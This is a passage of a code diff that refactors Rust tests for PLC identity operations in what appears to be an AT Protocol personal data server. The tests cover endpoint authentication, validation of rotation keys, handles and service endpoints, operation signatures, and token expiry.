"services": {
319
-
"atproto_pds": {
320
-
"type": "AtprotoPersonalDataServer",
321
-
"endpoint": format!("https://{}", hostname)
322
-
}
323
-
},
324
-
"prev": null,
325
-
"sig": "fake_signature"
326
-
}
327
-
}))
328
-
.send()
329
-
.await
330
-
.expect("Request failed");
331
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
332
-
let body: serde_json::Value = res.json().await.unwrap();
333
-
assert_eq!(body["error"], "InvalidRequest");
334
-
assert!(
335
-
body["message"]
336
-
.as_str()
337
-
.unwrap_or("")
338
-
.contains("signing key")
339
-
|| body["message"].as_str().unwrap_or("").contains("rotation"),
340
-
"Error should mention key mismatch: {:?}",
341
-
body
342
-
);
343
-
}
344
-
345
-
#[tokio::test]
346
-
async fn test_submit_plc_operation_wrong_handle() {
347
-
let client = client();
348
-
let (token, _did) = create_account_and_login(&client).await;
349
-
let hostname =
350
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
351
-
let res = client
352
-
.post(format!(
353
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
354
-
base_url().await
355
-
))
356
-
.bearer_auth(&token)
357
-
.json(&json!({
358
-
"operation": {
359
-
"type": "plc_operation",
360
-
"rotationKeys": ["did:key:z123"],
361
-
"verificationMethods": {"atproto": "did:key:z456"},
362
-
"alsoKnownAs": ["at://totally.wrong.handle"],
363
-
"services": {
364
-
"atproto_pds": {
365
-
"type": "AtprotoPersonalDataServer",
366
-
"endpoint": format!("https://{}", hostname)
367
-
}
368
-
},
369
-
"prev": null,
370
-
"sig": "fake_signature"
371
-
}
372
-
}))
373
-
.send()
374
-
.await
375
-
.expect("Request failed");
376
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
377
-
let body: serde_json::Value = res.json().await.unwrap();
378
-
assert_eq!(body["error"], "InvalidRequest");
379
-
}
380
-
381
-
#[tokio::test]
382
-
async fn test_submit_plc_operation_wrong_service_type() {
383
-
let client = client();
384
-
let (token, _did) = create_account_and_login(&client).await;
385
-
let hostname =
386
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
387
-
let res = client
388
-
.post(format!(
389
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
390
-
base_url().await
391
-
))
392
-
.bearer_auth(&token)
393
-
.json(&json!({
394
-
"operation": {
395
-
"type": "plc_operation",
396
-
"rotationKeys": ["did:key:z123"],
397
-
"verificationMethods": {"atproto": "did:key:z456"},
398
-
"alsoKnownAs": ["at://user"],
399
-
"services": {
400
-
"atproto_pds": {
401
-
"type": "WrongServiceType",
402
-
"endpoint": format!("https://{}", hostname)
403
-
}
404
-
},
405
-
"prev": null,
406
-
"sig": "fake_signature"
407
-
}
408
-
}))
409
-
.send()
410
-
.await
411
-
.expect("Request failed");
412
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
413
-
let body: serde_json::Value = res.json().await.unwrap();
414
-
assert_eq!(body["error"], "InvalidRequest");
415
-
}
416
-
417
-
#[tokio::test]
418
-
async fn test_plc_token_expiry_format() {
419
-
let client = client();
420
-
let (token, did) = create_account_and_login(&client).await;
421
-
let res = client
422
-
.post(format!(
423
-
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
424
-
base_url().await
425
-
))
426
-
.bearer_auth(&token)
427
-
.send()
428
-
.await
429
-
.expect("Request failed");
430
-
assert_eq!(res.status(), StatusCode::OK);
431
-
let db_url = get_db_connection_string().await;
432
-
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
433
-
let row = sqlx::query!(
434
-
r#"
435
-
SELECT t.expires_at
436
-
FROM plc_operation_tokens t
437
-
JOIN users u ON t.user_id = u.id
438
-
WHERE u.did = $1
439
-
"#,
440
-
did
441
-
)
442
-
.fetch_one(&pool)
443
-
.await
444
-
.expect("Query failed");
445
-
let now = chrono::Utc::now();
446
-
let expires = row.expires_at;
447
-
let diff = expires - now;
448
-
assert!(
449
-
diff.num_minutes() >= 9,
450
-
"Token should expire in ~10 minutes, got {} minutes",
451
-
diff.num_minutes()
452
-
);
453
-
assert!(
454
-
diff.num_minutes() <= 11,
455
-
"Token should expire in ~10 minutes, got {} minutes",
456
-
diff.num_minutes()
457
-
);
458
-
}
···
5
use sqlx::PgPool;
6
7
#[tokio::test]
8
+
async fn test_plc_operation_auth() {
9
let client = client();
10
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
11
+
.send().await.unwrap();
12
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
13
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
14
+
.json(&json!({})).send().await.unwrap();
15
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
16
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
17
+
.json(&json!({ "operation": {} })).send().await.unwrap();
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
19
+
let (token, _) = create_account_and_login(&client).await;
20
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
21
+
.bearer_auth(&token).send().await.unwrap();
22
+
assert_eq!(res.status(), StatusCode::OK);
23
}
24
25
#[tokio::test]
26
+
async fn test_sign_plc_operation_validation() {
27
let client = client();
28
+
let (token, _) = create_account_and_login(&client).await;
29
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
30
+
.bearer_auth(&token).json(&json!({})).send().await.unwrap();
31
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
32
let body: serde_json::Value = res.json().await.unwrap();
33
assert_eq!(body["error"], "InvalidRequest");
34
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
35
+
.bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap();
36
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
37
let body: serde_json::Value = res.json().await.unwrap();
38
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
39
}
40
41
#[tokio::test]
42
+
async fn test_submit_plc_operation_validation() {
43
let client = client();
44
+
let (token, did) = create_account_and_login(&client).await;
45
+
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
46
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
47
+
.bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap();
48
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
49
let body: serde_json::Value = res.json().await.unwrap();
50
assert_eq!(body["error"], "InvalidRequest");
51
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
52
+
.bearer_auth(&token).json(&json!({
53
+
"operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
54
+
"alsoKnownAs": [], "services": {}, "prev": null }
55
+
})).send().await.unwrap();
56
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
57
+
let handle = did.split(':').last().unwrap_or("user");
58
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
59
+
.bearer_auth(&token).json(&json!({
60
+
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
61
+
"verificationMethods": { "atproto": "did:key:z456" },
62
+
"alsoKnownAs": [format!("at://{}", handle)],
63
+
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": "https://wrong.example.com" } },
64
+
"prev": null, "sig": "fake_signature" }
65
+
})).send().await.unwrap();
66
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
67
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
68
+
.bearer_auth(&token).json(&json!({
69
+
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:zWrongRotationKey123"],
70
+
"verificationMethods": { "atproto": "did:key:zWrongVerificationKey456" },
71
+
"alsoKnownAs": [format!("at://{}", handle)],
72
+
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
73
+
"prev": null, "sig": "fake_signature" }
74
+
})).send().await.unwrap();
75
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
76
let body: serde_json::Value = res.json().await.unwrap();
77
assert_eq!(body["error"], "InvalidRequest");
78
+
assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation"));
79
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
80
+
.bearer_auth(&token).json(&json!({
81
+
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
82
+
"verificationMethods": { "atproto": "did:key:z456" },
83
+
"alsoKnownAs": ["at://totally.wrong.handle"],
84
+
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
85
+
"prev": null, "sig": "fake_signature" }
86
+
})).send().await.unwrap();
87
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
88
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
89
+
.bearer_auth(&token).json(&json!({
90
+
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
91
+
"verificationMethods": { "atproto": "did:key:z456" },
92
+
"alsoKnownAs": ["at://user"],
93
+
"services": { "atproto_pds": { "type": "WrongServiceType", "endpoint": format!("https://{}", hostname) } },
94
+
"prev": null, "sig": "fake_signature" }
95
+
})).send().await.unwrap();
96
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
97
}
98
99
#[tokio::test]
100
+
async fn test_plc_token_lifecycle() {
101
let client = client();
102
let (token, did) = create_account_and_login(&client).await;
103
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
104
+
.bearer_auth(&token).send().await.unwrap();
105
assert_eq!(res.status(), StatusCode::OK);
106
let db_url = get_db_connection_string().await;
107
+
let pool = PgPool::connect(&db_url).await.unwrap();
108
let row = sqlx::query!(
109
+
"SELECT t.token, t.expires_at FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1",
110
did
111
+
).fetch_optional(&pool).await.unwrap();
112
assert!(row.is_some(), "PLC token should be created in database");
113
let row = row.unwrap();
114
+
assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx");
115
assert!(row.token.contains('-'), "Token should contain hyphen");
116
+
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
117
+
let diff = row.expires_at - chrono::Utc::now();
118
+
assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes");
119
+
let token1 = row.token.clone();
120
+
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
121
+
.bearer_auth(&token).send().await.unwrap();
122
+
assert_eq!(res.status(), StatusCode::OK);
123
let token2 = sqlx::query_scalar!(
124
+
"SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
125
+
).fetch_one(&pool).await.unwrap();
126
assert_ne!(token1, token2, "Second request should generate a new token");
127
let count: i64 = sqlx::query_scalar!(
128
+
"SELECT COUNT(*) as \"count!\" FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
129
+
).fetch_one(&pool).await.unwrap();
130
assert_eq!(count, 1, "Should only have one token per user");
131
}
+82
-367
tests/plc_validation.rs
+82
-367
tests/plc_validation.rs
···
13
let op = json!({
14
"type": "plc_operation",
15
"rotationKeys": [did_key.clone()],
16
-
"verificationMethods": {
17
-
"atproto": did_key.clone()
18
-
},
19
"alsoKnownAs": ["at://test.handle"],
20
"services": {
21
"atproto_pds": {
···
29
}
30
31
#[test]
32
-
fn test_validate_plc_operation_valid() {
33
let op = create_valid_operation();
34
-
let result = validate_plc_operation(&op);
35
-
assert!(result.is_ok());
36
-
}
37
38
-
#[test]
39
-
fn test_validate_plc_operation_missing_type() {
40
-
let op = json!({
41
-
"rotationKeys": [],
42
-
"verificationMethods": {},
43
-
"alsoKnownAs": [],
44
-
"services": {},
45
-
"sig": "test"
46
-
});
47
-
let result = validate_plc_operation(&op);
48
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
49
-
}
50
51
-
#[test]
52
-
fn test_validate_plc_operation_invalid_type() {
53
-
let op = json!({
54
-
"type": "invalid_type",
55
-
"sig": "test"
56
-
});
57
-
let result = validate_plc_operation(&op);
58
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
59
-
}
60
61
-
#[test]
62
-
fn test_validate_plc_operation_missing_sig() {
63
-
let op = json!({
64
-
"type": "plc_operation",
65
-
"rotationKeys": [],
66
-
"verificationMethods": {},
67
-
"alsoKnownAs": [],
68
-
"services": {}
69
-
});
70
-
let result = validate_plc_operation(&op);
71
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
72
-
}
73
74
-
#[test]
75
-
fn test_validate_plc_operation_missing_rotation_keys() {
76
-
let op = json!({
77
-
"type": "plc_operation",
78
-
"verificationMethods": {},
79
-
"alsoKnownAs": [],
80
-
"services": {},
81
-
"sig": "test"
82
-
});
83
-
let result = validate_plc_operation(&op);
84
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
85
-
}
86
87
-
#[test]
88
-
fn test_validate_plc_operation_missing_verification_methods() {
89
-
let op = json!({
90
-
"type": "plc_operation",
91
-
"rotationKeys": [],
92
-
"alsoKnownAs": [],
93
-
"services": {},
94
-
"sig": "test"
95
-
});
96
-
let result = validate_plc_operation(&op);
97
-
assert!(
98
-
matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))
99
-
);
100
-
}
101
102
-
#[test]
103
-
fn test_validate_plc_operation_missing_also_known_as() {
104
-
let op = json!({
105
-
"type": "plc_operation",
106
-
"rotationKeys": [],
107
-
"verificationMethods": {},
108
-
"services": {},
109
-
"sig": "test"
110
-
});
111
-
let result = validate_plc_operation(&op);
112
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
113
-
}
114
115
-
#[test]
116
-
fn test_validate_plc_operation_missing_services() {
117
-
let op = json!({
118
-
"type": "plc_operation",
119
-
"rotationKeys": [],
120
-
"verificationMethods": {},
121
-
"alsoKnownAs": [],
122
-
"sig": "test"
123
-
});
124
-
let result = validate_plc_operation(&op);
125
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
126
}
127
128
#[test]
129
-
fn test_validate_rotation_key_required() {
130
let key = SigningKey::random(&mut rand::thread_rng());
131
let did_key = signing_key_to_did_key(&key);
132
let server_key = "did:key:zServer123";
133
-
let op = json!({
134
"type": "plc_operation",
135
-
"rotationKeys": [did_key.clone()],
136
-
"verificationMethods": {"atproto": did_key.clone()},
137
-
"alsoKnownAs": ["at://test.handle"],
138
-
"services": {
139
-
"atproto_pds": {
140
-
"type": "AtprotoPersonalDataServer",
141
-
"endpoint": "https://pds.example.com"
142
-
}
143
-
},
144
"sig": "test"
145
});
146
let ctx = PlcValidationContext {
147
server_rotation_key: server_key.to_string(),
148
expected_signing_key: did_key.clone(),
149
expected_handle: "test.handle".to_string(),
150
expected_pds_endpoint: "https://pds.example.com".to_string(),
151
};
152
-
let result = validate_plc_operation_for_submission(&op, &ctx);
153
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
154
-
}
155
156
-
#[test]
157
-
fn test_validate_signing_key_match() {
158
-
let key = SigningKey::random(&mut rand::thread_rng());
159
-
let did_key = signing_key_to_did_key(&key);
160
-
let wrong_key = "did:key:zWrongKey456";
161
-
let op = json!({
162
-
"type": "plc_operation",
163
-
"rotationKeys": [did_key.clone()],
164
-
"verificationMethods": {"atproto": wrong_key},
165
-
"alsoKnownAs": ["at://test.handle"],
166
-
"services": {
167
-
"atproto_pds": {
168
-
"type": "AtprotoPersonalDataServer",
169
-
"endpoint": "https://pds.example.com"
170
-
}
171
-
},
172
-
"sig": "test"
173
-
});
174
-
let ctx = PlcValidationContext {
175
-
server_rotation_key: did_key.clone(),
176
-
expected_signing_key: did_key.clone(),
177
-
expected_handle: "test.handle".to_string(),
178
-
expected_pds_endpoint: "https://pds.example.com".to_string(),
179
-
};
180
-
let result = validate_plc_operation_for_submission(&op, &ctx);
181
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
182
-
}
183
184
-
#[test]
185
-
fn test_validate_handle_match() {
186
-
let key = SigningKey::random(&mut rand::thread_rng());
187
-
let did_key = signing_key_to_did_key(&key);
188
-
let op = json!({
189
-
"type": "plc_operation",
190
-
"rotationKeys": [did_key.clone()],
191
-
"verificationMethods": {"atproto": did_key.clone()},
192
-
"alsoKnownAs": ["at://wrong.handle"],
193
-
"services": {
194
-
"atproto_pds": {
195
-
"type": "AtprotoPersonalDataServer",
196
-
"endpoint": "https://pds.example.com"
197
-
}
198
-
},
199
-
"sig": "test"
200
-
});
201
-
let ctx = PlcValidationContext {
202
server_rotation_key: did_key.clone(),
203
expected_signing_key: did_key.clone(),
204
expected_handle: "test.handle".to_string(),
205
expected_pds_endpoint: "https://pds.example.com".to_string(),
206
};
207
-
let result = validate_plc_operation_for_submission(&op, &ctx);
208
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
209
-
}
210
211
-
#[test]
212
-
fn test_validate_pds_service_type() {
213
-
let key = SigningKey::random(&mut rand::thread_rng());
214
-
let did_key = signing_key_to_did_key(&key);
215
-
let op = json!({
216
-
"type": "plc_operation",
217
-
"rotationKeys": [did_key.clone()],
218
-
"verificationMethods": {"atproto": did_key.clone()},
219
-
"alsoKnownAs": ["at://test.handle"],
220
-
"services": {
221
-
"atproto_pds": {
222
-
"type": "WrongServiceType",
223
-
"endpoint": "https://pds.example.com"
224
-
}
225
-
},
226
-
"sig": "test"
227
-
});
228
-
let ctx = PlcValidationContext {
229
-
server_rotation_key: did_key.clone(),
230
-
expected_signing_key: did_key.clone(),
231
-
expected_handle: "test.handle".to_string(),
232
-
expected_pds_endpoint: "https://pds.example.com".to_string(),
233
-
};
234
-
let result = validate_plc_operation_for_submission(&op, &ctx);
235
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
236
-
}
237
238
-
#[test]
239
-
fn test_validate_pds_endpoint_match() {
240
-
let key = SigningKey::random(&mut rand::thread_rng());
241
-
let did_key = signing_key_to_did_key(&key);
242
-
let op = json!({
243
-
"type": "plc_operation",
244
-
"rotationKeys": [did_key.clone()],
245
-
"verificationMethods": {"atproto": did_key.clone()},
246
-
"alsoKnownAs": ["at://test.handle"],
247
-
"services": {
248
-
"atproto_pds": {
249
-
"type": "AtprotoPersonalDataServer",
250
-
"endpoint": "https://wrong.endpoint.com"
251
-
}
252
-
},
253
-
"sig": "test"
254
-
});
255
-
let ctx = PlcValidationContext {
256
-
server_rotation_key: did_key.clone(),
257
-
expected_signing_key: did_key.clone(),
258
-
expected_handle: "test.handle".to_string(),
259
-
expected_pds_endpoint: "https://pds.example.com".to_string(),
260
-
};
261
-
let result = validate_plc_operation_for_submission(&op, &ctx);
262
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
263
}
264
265
#[test]
266
-
fn test_verify_signature_secp256k1() {
267
let key = SigningKey::random(&mut rand::thread_rng());
268
let did_key = signing_key_to_did_key(&key);
269
let op = json!({
270
-
"type": "plc_operation",
271
-
"rotationKeys": [did_key.clone()],
272
-
"verificationMethods": {},
273
-
"alsoKnownAs": [],
274
-
"services": {},
275
-
"prev": null
276
});
277
let signed = sign_operation(&op, &key).unwrap();
278
-
let rotation_keys = vec![did_key];
279
-
let result = verify_operation_signature(&signed, &rotation_keys);
280
-
assert!(result.is_ok());
281
-
assert!(result.unwrap());
282
-
}
283
284
-
#[test]
285
-
fn test_verify_signature_wrong_key() {
286
-
let key = SigningKey::random(&mut rand::thread_rng());
287
let other_key = SigningKey::random(&mut rand::thread_rng());
288
-
let other_did_key = signing_key_to_did_key(&other_key);
289
-
let op = json!({
290
-
"type": "plc_operation",
291
-
"rotationKeys": [],
292
-
"verificationMethods": {},
293
-
"alsoKnownAs": [],
294
-
"services": {},
295
-
"prev": null
296
-
});
297
-
let signed = sign_operation(&op, &key).unwrap();
298
-
let wrong_rotation_keys = vec![other_did_key];
299
-
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
300
-
assert!(result.is_ok());
301
-
assert!(!result.unwrap());
302
-
}
303
304
-
#[test]
305
-
fn test_verify_signature_invalid_did_key_format() {
306
-
let key = SigningKey::random(&mut rand::thread_rng());
307
-
let op = json!({
308
-
"type": "plc_operation",
309
-
"rotationKeys": [],
310
-
"verificationMethods": {},
311
-
"alsoKnownAs": [],
312
-
"services": {},
313
-
"prev": null
314
-
});
315
-
let signed = sign_operation(&op, &key).unwrap();
316
-
let invalid_keys = vec!["not-a-did-key".to_string()];
317
-
let result = verify_operation_signature(&signed, &invalid_keys);
318
-
assert!(result.is_ok());
319
-
assert!(!result.unwrap());
320
-
}
321
322
-
#[test]
323
-
fn test_tombstone_validation() {
324
-
let op = json!({
325
-
"type": "plc_tombstone",
326
-
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
327
-
"sig": "test"
328
});
329
-
let result = validate_plc_operation(&op);
330
-
assert!(result.is_ok());
331
}
332
333
#[test]
334
-
fn test_cid_for_cbor_deterministic() {
335
-
let value = json!({
336
-
"alpha": 1,
337
-
"beta": 2
338
-
});
339
let cid1 = cid_for_cbor(&value).unwrap();
340
let cid2 = cid_for_cbor(&value).unwrap();
341
-
assert_eq!(cid1, cid2, "CID generation should be deterministic");
342
-
assert!(
343
-
cid1.starts_with("bafyrei"),
344
-
"CID should start with bafyrei (dag-cbor + sha256)"
345
-
);
346
-
}
347
348
-
#[test]
349
-
fn test_cid_different_for_different_data() {
350
-
let value1 = json!({"data": 1});
351
-
let value2 = json!({"data": 2});
352
-
let cid1 = cid_for_cbor(&value1).unwrap();
353
-
let cid2 = cid_for_cbor(&value2).unwrap();
354
-
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
355
-
}
356
357
-
#[test]
358
-
fn test_signing_key_to_did_key_format() {
359
let key = SigningKey::random(&mut rand::thread_rng());
360
-
let did_key = signing_key_to_did_key(&key);
361
-
assert!(
362
-
did_key.starts_with("did:key:z"),
363
-
"Should start with did:key:z"
364
-
);
365
-
assert!(did_key.len() > 50, "Did key should be reasonably long");
366
-
}
367
368
-
#[test]
369
-
fn test_signing_key_to_did_key_unique() {
370
-
let key1 = SigningKey::random(&mut rand::thread_rng());
371
let key2 = SigningKey::random(&mut rand::thread_rng());
372
-
let did1 = signing_key_to_did_key(&key1);
373
-
let did2 = signing_key_to_did_key(&key2);
374
-
assert_ne!(
375
-
did1, did2,
376
-
"Different keys should produce different did:keys"
377
-
);
378
-
}
379
-
380
-
#[test]
381
-
fn test_signing_key_to_did_key_consistent() {
382
-
let key = SigningKey::random(&mut rand::thread_rng());
383
-
let did1 = signing_key_to_did_key(&key);
384
-
let did2 = signing_key_to_did_key(&key);
385
-
assert_eq!(did1, did2, "Same key should produce same did:key");
386
-
}
387
-
388
-
#[test]
389
-
fn test_sign_operation_removes_existing_sig() {
390
-
let key = SigningKey::random(&mut rand::thread_rng());
391
-
let op = json!({
392
-
"type": "plc_operation",
393
-
"rotationKeys": [],
394
-
"verificationMethods": {},
395
-
"alsoKnownAs": [],
396
-
"services": {},
397
-
"prev": null,
398
-
"sig": "old_signature"
399
-
});
400
-
let signed = sign_operation(&op, &key).unwrap();
401
-
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
402
-
assert_ne!(new_sig, "old_signature", "Should replace old signature");
403
}
404
405
#[test]
406
-
fn test_validate_plc_operation_not_object() {
407
-
let result = validate_plc_operation(&json!("not an object"));
408
-
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
409
-
}
410
411
-
#[test]
412
-
fn test_validate_for_submission_tombstone_passes() {
413
let key = SigningKey::random(&mut rand::thread_rng());
414
let did_key = signing_key_to_did_key(&key);
415
-
let op = json!({
416
-
"type": "plc_tombstone",
417
-
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
418
-
"sig": "test"
419
-
});
420
let ctx = PlcValidationContext {
421
server_rotation_key: did_key.clone(),
422
expected_signing_key: did_key,
423
expected_handle: "test.handle".to_string(),
424
expected_pds_endpoint: "https://pds.example.com".to_string(),
425
};
426
-
let result = validate_plc_operation_for_submission(&op, &ctx);
427
-
assert!(
428
-
result.is_ok(),
429
-
"Tombstone should pass submission validation"
430
-
);
431
-
}
432
-
433
-
#[test]
434
-
fn test_verify_signature_missing_sig() {
435
-
let op = json!({
436
-
"type": "plc_operation",
437
-
"rotationKeys": [],
438
-
"verificationMethods": {},
439
-
"alsoKnownAs": [],
440
-
"services": {}
441
-
});
442
-
let result = verify_operation_signature(&op, &[]);
443
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
444
}
445
446
#[test]
447
-
fn test_verify_signature_invalid_base64() {
448
let op = json!({
449
-
"type": "plc_operation",
450
-
"rotationKeys": [],
451
-
"verificationMethods": {},
452
-
"alsoKnownAs": [],
453
-
"services": {},
454
-
"sig": "not-valid-base64!!!"
455
});
456
-
let result = verify_operation_signature(&op, &[]);
457
-
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
458
-
}
459
460
-
#[test]
461
-
fn test_plc_operation_struct() {
462
let mut services = HashMap::new();
463
-
services.insert(
464
-
"atproto_pds".to_string(),
465
-
PlcService {
466
-
service_type: "AtprotoPersonalDataServer".to_string(),
467
-
endpoint: "https://pds.example.com".to_string(),
468
-
},
469
-
);
470
let mut verification_methods = HashMap::new();
471
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
472
let op = PlcOperation {
···
13
let op = json!({
14
"type": "plc_operation",
15
"rotationKeys": [did_key.clone()],
16
+
"verificationMethods": { "atproto": did_key.clone() },
17
"alsoKnownAs": ["at://test.handle"],
18
"services": {
19
"atproto_pds": {
···
27
}
28
29
#[test]
30
+
fn test_plc_operation_basic_validation() {
31
let op = create_valid_operation();
32
+
assert!(validate_plc_operation(&op).is_ok());
33
+
34
+
let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
35
+
assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
36
37
+
let invalid_type = json!({ "type": "invalid_type", "sig": "test" });
38
+
assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
39
40
+
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
41
+
assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
42
43
+
let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
44
+
assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
45
46
+
let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" });
47
+
assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
48
49
+
let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" });
50
+
assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
51
52
+
let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" });
53
+
assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
54
55
+
assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_))));
56
}
57
58
#[test]
59
+
fn test_plc_submission_validation() {
60
let key = SigningKey::random(&mut rand::thread_rng());
61
let did_key = signing_key_to_did_key(&key);
62
let server_key = "did:key:zServer123";
63
+
64
+
let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({
65
"type": "plc_operation",
66
+
"rotationKeys": [rotation_key],
67
+
"verificationMethods": {"atproto": signing_key},
68
+
"alsoKnownAs": [format!("at://{}", handle)],
69
+
"services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } },
70
"sig": "test"
71
});
72
+
73
let ctx = PlcValidationContext {
74
server_rotation_key: server_key.to_string(),
75
expected_signing_key: did_key.clone(),
76
expected_handle: "test.handle".to_string(),
77
expected_pds_endpoint: "https://pds.example.com".to_string(),
78
};
79
80
+
let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
81
+
assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
82
83
+
let ctx_with_user_key = PlcValidationContext {
84
server_rotation_key: did_key.clone(),
85
expected_signing_key: did_key.clone(),
86
expected_handle: "test.handle".to_string(),
87
expected_pds_endpoint: "https://pds.example.com".to_string(),
88
};
89
90
+
let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
91
+
